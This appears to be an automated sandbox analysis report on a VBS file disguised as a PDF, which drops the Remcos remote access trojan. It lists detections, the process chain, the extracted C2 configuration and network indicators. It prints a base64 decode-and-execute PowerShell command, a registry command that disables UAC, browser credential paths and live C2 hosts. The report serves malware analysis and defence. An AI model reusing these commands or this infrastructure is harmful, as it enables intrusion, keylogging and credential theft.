
Windows Analysis Report
Aktarma,pdf.vbs

Overview

General Information

Sample name: Aktarma,pdf.vbs
Analysis ID: 1571703
MD5: 8c5cf018a9128cb2a9267ee3c4183a0c
SHA1: c0e11113ae0360e55302ceecbc7a356ed732ca18
SHA256: d3307a065f67a642d7425c6b9774b6a145a786d64997b977deb151c03e0caf7e
Tags: RAT, RemcosRAT, vbs, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 524 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = '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';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7520 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 7696 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • MSBuild.exe (PID: 7704 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • wscript.exe (PID: 7648 cmdline: wscript.exe C:\ProgramData\classers.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • svchost.exe (PID: 8064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["rem.pushswroller.eu:23101:1", "firewarzone.ydns.eu:23101:1", "sun.drillmmcsnk.eu:23101:1"], "Assigned name": "NW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmcghghyrtssxr-7RL1P2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
0000000F.00000002.3423491329.0000000002D9F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000F.00000002.3421145028.0000000001208000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
15.2.MSBuild.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
15.2.MSBuild.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
15.2.MSBuild.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
15.2.MSBuild.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6aaf8:$a1: Remcos restarted by watchdog!
  • 0x6b070:$a3: %02i:%02i:%02i:%03i
15.2.MSBuild.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64e04:$str_b2: Executing file:
  • 0x65c3c:$str_b3: GetDirectListeningPort
  • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65780:$str_b7: \update.vbs
  • 0x64e2c:$str_b9: Downloaded file:
  • 0x64e18:$str_b10: Downloading file:
  • 0x64ebc:$str_b12: Failed to upload file:
  • 0x65c04:$str_b13: StartForward
  • 0x65c24:$str_b14: StopForward
  • 0x656d8:$str_b15: fso.DeleteFile "
  • 0x6566c:$str_b16: On Error Resume Next
  • 0x65708:$str_b17: fso.DeleteFolder "
  • 0x64eac:$str_b18: Uploaded file:
  • 0x64e6c:$str_b19: Unable to delete:
  • 0x656a0:$str_b20: while fso.FileExists("
  • 0x65349:$str_c0: [Firefox StoredLogins not found]

Source | Rule | Description | Author | Strings
amsi64_2020.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_2020.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = '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';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = '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
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = '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';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = '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
Source: Network Connection | Author: Kiran kumar s, oscd.community | Data: DestinationIp: 178.237.33.50, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7704, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49790
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs", ProcessId: 524, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = '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';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2020, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs", ProcessId: 7520, ProcessName: cmd.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Aktarma,pdf.vbs", ProcessId: 524, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = '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';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = '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
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8064, ProcessName: svchost.exe

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 7704, TargetFilename: C:\ProgramData\remcos\logs.dat

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-09T16:34:29.895976+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 172.67.187.200 | 443 | 192.168.2.6 | 49772 | TCP
2024-12-09T16:34:29.895976+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 172.67.187.200 | 443 | 192.168.2.6 | 49772 | TCP
2024-12-09T16:34:33.032018+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49783 | 45.80.158.30 | 23101 | TCP
2024-12-09T16:34:10.058334+0100 | 2049038 | 1 | A Network Trojan was detected | 151.101.1.137 | 443 | 192.168.2.6 | 49714 | TCP
2024-12-09T16:34:35.733300+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 49790 | 178.237.33.50 | 80 | TCP
2024-12-09T16:34:30.873229+0100 | 2858295 | 1 | A Network Trojan was detected | 172.67.187.200 | 443 | 192.168.2.6 | 49772 | TCP
2024-12-09T16:34:29.498194+0100 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49772 | 172.67.187.200 | 443 | TCP

AV Detection

Source: rem.pushswroller.eu | Avira URL Cloud: Label: malware
Source: 0000000F.00000002.3421145028.0000000001208000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["rem.pushswroller.eu:23101:1", "firewarzone.ydns.eu:23101:1", "sun.drillmmcsnk.eu:23101:1"], "Assigned name": "NW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmcghghyrtssxr-7RL1P2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.3423491329.0000000002D9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3421145028.0000000001208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.4% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_0043293A
Source: MSBuild.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7704, type: MEMORYSTR

Privilege Escalation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00406764 _wcslen,CoGetObject,15_2_00406764
Source: unknown | HTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49760 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.6:49772 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,15_2_0041B42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0044D5E9 FindFirstFileExA,15_2_0044D5E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,15_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00406AC2 FindFirstFileW,FindNextFileW,15_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,15_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00418C69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,15_2_00408DA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00406F06

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49783 -> 45.80.158.30:23101
Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.6:49714
Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.67.187.200:443 -> 192.168.2.6:49772
Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.67.187.200:443 -> 192.168.2.6:49772
Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.67.187.200:443 -> 192.168.2.6:49772
Source: Malware configuration extractor | URLs: rem.pushswroller.eu
Source: Malware configuration extractor | URLs: firewarzone.ydns.eu
Source: Malware configuration extractor | URLs: sun.drillmmcsnk.eu
Source: unknown | DNS query: name: paste.ee
Source: global traffic | TCP traffic: 192.168.2.6:49783 -> 45.80.158.30:23101
Source: classers.vbs.10.dr | Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: classers.vbs.10.dr | Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
Source: global traffic | HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1 | Host: res.cloudinary.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /r/TZC1n/0 HTTP/1.1 | Host: paste.ee | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 172.67.187.200 172.67.187.200
Source: Joe Sandbox View | IP Address: 151.101.1.137 151.101.1.137
Source: Joe Sandbox View | ASN Name: UK2NET-ASGB UK2NET-ASGB
Source: Joe Sandbox View | JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49790 -> 178.237.33.50:80
Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49772 -> 172.67.187.200:443
Source: unknown | TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_004260F7 recv,15_2_004260F7
                        Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                        Source: global trafficDNS traffic detected: DNS query: tse1.mm.bing.net
                        Source: global trafficDNS traffic detected: DNS query: paste.ee
                        Source: global trafficDNS traffic detected: DNS query: rem.pushswroller.eu
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: svchost.exe, 00000012.00000002.3420667451.000002DC70C00000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
                        Source: qmgr.db.18.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                        Source: qmgr.db.18.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
                        Source: qmgr.db.18.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                        Source: qmgr.db.18.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                        Source: qmgr.db.18.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                        Source: qmgr.db.18.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                        Source: qmgr.db.18.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                        Source: qmgr.db.18.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.000000000124A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.000000000124A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp%h
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001247000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp(V
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001247000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp-V)
                        Source: MSBuild.exe, 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001223000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpSystem32
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.0000000001247000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpVT
                        Source: MSBuild.exe, 0000000F.00000002.3421145028.000000000124A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpal
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1851000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1851000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee;
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com;
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.gstatic.com;
                        Source: qmgr.db.18.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                        Source: svchost.exe, 00000012.00000003.2503873978.000002DC70B20000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                        Source: powershell.exe, 00000002.00000002.2437373901.000001E7B1A72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
